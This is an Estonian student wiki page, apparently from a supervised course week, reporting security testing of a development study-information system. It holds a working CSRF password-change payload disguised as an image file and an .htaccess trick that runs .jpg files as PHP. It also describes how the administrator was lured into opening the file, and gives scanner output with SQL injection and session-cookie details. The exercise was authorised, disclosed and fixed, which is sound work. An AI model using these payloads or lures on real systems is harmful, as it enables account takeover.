    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
====2. katse - ÕIS&#039;i kasutaja parooli muutmine ====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|250px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|250px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|250px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Burp suite===&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Nessuse algkäivitamine===&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Backtrack: w3af ===&lt;br /&gt;
[[File:Basic HTTP Auth.png|250px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|250px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|250px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Skänneerimine &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Soovitus ===&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult näiteks: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlesime selle kuulajaskonnale.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
Video (meie esitlus on alates 11:20&#039;st):&lt;br /&gt;
&lt;br /&gt;
http://echo360.e-uni.ee/ess/echo/presentation/da8c32af-52d0-4a02-85fa-24f9323f8ce9&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Alo:&amp;lt;/b&amp;gt; Intensiivõppe nädal oli väga huvitav kogemus, nädalaga sai õpitud palju uut ja huvitavat. Meeskonnatöö sujus hästi ja nädala algul püsitatud eesmärgid said täidetud. Isiklikult soovitan intensiivõppe nädalal osaleda kõigil kellel vähegi võimalik.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Sander:&amp;lt;/b&amp;gt; Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Urmo:&amp;lt;/b&amp;gt; Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Taavi:&amp;lt;/b&amp;gt;Intensiivõppenädal on väga hea võimalus lühikese ajaperioodiga omandada väga palju uusi ja huvitavaid teadmisi ning oskusi.Kindlasti soovitan kõigile intensiivõppenädalal osalemist.Ärge olge heidutatud ka inimesed kes arvavad, et neil on vähe või puudulikud oskused või teadmised, intensiivõppenädalal ei ole eeldatud, et te juba oskate asju vaid see nädal ongi õppimiseks. Tore kogemus ja kõik järgmine aasta osalema.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Matis:&amp;lt;/b&amp;gt; Olin veel viimase hetkeni täiesti kahe vahel, et kas minna intensiivõppe nädalale või mitte. Siiski otsustasin minna ja olen väga väga rahul et sedasi otsustasin. Sain väga palju uusi teadmisi erinevate testprogrammide ja -keskkondade kasutamise kohta. Hea kogemus ka tiimiga töötada, ülesandeid jagada ja üldisel koostööl. Soovitan kindlasti ka teistel tudengitel osaleda intensiivõppe nädalal. Väga hea võimalus reaalseid ülesandeid ja probleeme, mis võivad tulevikus ette tulla, läbi teha.&lt;br /&gt;
&lt;br /&gt;
== Kasutatud materjalid ==&lt;br /&gt;
 http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
 http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
 http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
 http://sectools.org/tag/web-scanners/&lt;br /&gt;
 http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
 http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
:Alo Konno A21&lt;br /&gt;
:Urmo Lihten A21&lt;br /&gt;
:Taavi Podžuks A22&lt;br /&gt;
:Matis Alliksoo A22&lt;br /&gt;
:Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Täname oma juhendajaid:&lt;br /&gt;
:Mart Mangus&lt;br /&gt;
:Margus Ernits&lt;br /&gt;
:Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47155</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47155"/>
		<updated>2012-04-02T09:24:34Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Arvamused intensiivõppe nädala kohta */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
Nädal algas kell 10.00 ruumis 314, kus tutvustati ülesandeid, mida on võimalik valida.&lt;br /&gt;
&lt;br /&gt;
Meie valisime ülesandeks: &amp;quot;ÕIS arendusversiooni turvatestimine&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Meeskonna liikmeteks said Urmo Lihten, Taavi Podzuks, Matis Alliksoo, Alo Konno ja Sander Saarm. &lt;br /&gt;
&lt;br /&gt;
Tiimi nimeks valisime „Security team“.&lt;br /&gt;
&lt;br /&gt;
Pärat teema valimist andis juhendaja Margus Ernits meile juhtnöörid, kuidas oleks mõistlik tiimitööd teha, lisaks andis ta ka lingi mille pealt oleks kõige parem õppida:&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
Jagasime teemad ära:&lt;br /&gt;
&lt;br /&gt;
::A1: Injection - Urmo&lt;br /&gt;
::A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
::A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
::A4: Insecure Direct Object References - Alo&lt;br /&gt;
::A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
::A6: Security Misconfiguration - Matis&lt;br /&gt;
::A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
::A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
::A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
::A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Igaüks tegi selgeks enda kaks teemat ja päeva lõpuks kandsime need ükteisele ja kuulajatele ette:&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
:1.1	Tutvuda OWASP’iga. &lt;br /&gt;
:1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
:1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
:2.1	Esitada tiimi tegevusplaani juhendajale.&lt;br /&gt;
:2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
:2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
:2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
:3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
:3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
:4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
:5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
=== Fireforce plugin Firefoxis ===&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
&lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
&lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Burpsuite v1.4 ===&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
